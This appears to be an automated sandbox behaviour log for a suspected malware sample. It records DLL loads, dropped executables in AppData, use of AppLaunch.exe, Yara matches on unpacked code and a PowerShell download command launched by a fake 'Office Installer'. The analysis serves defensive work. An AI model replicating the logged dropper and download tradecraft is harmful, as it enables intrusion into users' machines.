Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: globinputhost.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptnet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cabinet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe File written: C:\Users\user\AppData\Local\Temp\Office Installer.ini
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe File opened: C:\Windows\system32\MSFTEDIT.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Window detected: Number of UI elements: 13
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration
Source: Gm602axA2d.exe Static file information: File size 19303424 > 1048576
Source: Gm602axA2d.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1222000
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 3.2.Vulvvmkewji.exe.7af0000.22.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 3.2.Vulvvmkewji.exe.7401a08.16.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"
Source: Yara match File source: 16.2.Lxfrfbi.exe.57849f8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.77517a8.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.52049f8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.6e917a8.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.73817c8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7291788.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.7701788.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.7701788.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.31fb2c0.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7291788.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3a87008.0.raw.unpack, type: UNPACKEDPE
